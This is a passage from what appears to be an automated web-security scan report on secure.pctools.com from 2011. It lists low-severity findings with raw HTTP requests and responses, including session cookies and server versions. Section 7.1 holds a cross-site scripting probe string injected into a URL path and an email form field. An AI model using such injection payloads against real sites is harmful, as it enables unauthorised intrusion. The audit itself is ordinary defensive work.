Path:   /spyware-doctor-antivirus/purchase/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /spyware-doctor-antivirus/purchase/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www4.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:02 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.32. https://secure.pctools.com/spyware-doctor/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /spyware-doctor/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /spyware-doctor/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www5.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:01 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.33. https://secure.pctools.com/spyware-doctor/download/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /spyware-doctor/download/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /spyware-doctor/download/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www5.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:01 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.34. https://secure.pctools.com/spyware-doctor/purchase/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /spyware-doctor/purchase/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /spyware-doctor/purchase/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www1.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:01 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.35. https://secure.pctools.com/support/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /support/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: HIT from www6.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:25 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.36. https://secure.pctools.com/synchronize/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /synchronize/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /synchronize/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www3.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:25 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

6. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



6.1. https://secure.pctools.com/myaccount/logout/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /myaccount/logout/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /myaccount/logout/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /myaccount/
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www7.pctools.com:8080
Date: Mon, 21 Mar 2011 01:13:56 GMT
Connection: close
Set-Cookie: myaccount=deleted; expires=Sun, 21 Mar 2010 01:13:55 GMT; path=/
Content-Length: 19250

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account
</title>
   <meta http-equiv="content-type" conte
...[SNIP]...

6.2. https://secure.pctools.com/res/js/uniqueid.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /res/js/uniqueid.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /res/js/uniqueid.php HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
Referer: https://secure.pctools.com/myaccount/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300669873828-New%7C1321405873828%3B%20event69%3Devent69%7C1321405873830%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671785|PC#1300668855394-755649.17#1301879525|check#true#1300669985

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 21 Mar 2011 01:11:16 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
X-Cache-Lookup: MISS from www5.pctools.com:8080
Date: Mon, 21 Mar 2011 01:11:16 GMT
Connection: keep-alive
Set-Cookie: ccheck=deleted; expires=Sun, 21 Mar 2010 01:11:15 GMT; path=/; domain=.pctools.com
Content-Length: 111

var uniqueID = "071299204246230163";
var s_campaign = "";
var s_prop1 = "";
var cb = 177246278;
var cd = 85714;

7. Email addresses disclosed  previous  next
There are 3 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


7.1. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E

Issue detail

The following email addresses were disclosed in the response:

Request

POST /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
Referer: https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E
Cache-Control: max-age=0
Origin: https://secure.pctools.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671988|PC#1300668855394-755649.17#1301879728|check#true#1300670188; IS3_GSV=DPL-2_TES-1300668856_PCT-1300670164_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com
Content-Length: 130

step=2e957eb8c030fc2d10de5607715f4c55&email=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000745%29%3C%2Fscript%3E

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www5.pctools.com:8080
Date: Mon, 21 Mar 2011 01:15:52 GMT
Connection: keep-alive
Content-Length: 22237

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account Signup
</title>
   <meta http-equiv="content-type
...[SNIP]...
<i>username@isp.com</i>, if you are an AOL user please enter your ScreenName@aol.com</div>
...[SNIP]...

7.2. https://secure.pctools.com/res/ajax/newsletter.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /res/ajax/newsletter.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /res/ajax/newsletter.php?email= HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www6.pctools.com:8080
Date: Mon, 21 Mar 2011 01:13:56 GMT
Content-Length: 166
Connection: close

E-mail address cannot be blank. Please provide a valid e-mail address in the form <i>username@isp.com</i>, if you are an AOL user please enter your ScreenName@aol.com

7.3. https://secure.pctools.com/res/new/js/jquery.hoverIntent.minified.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /res/new/js/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

Request

GET /res/new/js/jquery.hoverIntent.minified.js HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
Referer: https://secure.pctools.com/myaccount/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300669873828-New%7C1321405873828%3B%20event69%3Devent69%7C1321405873830%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671785|PC#1300668855394-755649.17#1301879525|check#true#1300669985

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 08 Sep 2010 02:40:35 GMT
ETag: "a60424-649-48fb67022eec0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
X-Cache-Lookup: HIT from www6.pctools.com:8080
Vary: Accept-Encoding
Date: Mon, 21 Mar 2011 01:11:15 GMT
Connection: keep-alive
Content-Length: 1609

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

8. Cacheable HTTPS response  previous  next
There are 2 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


8.1. https://secure.pctools.com/authenticate/auth.php  previous  next

Summary

Severity:   Information
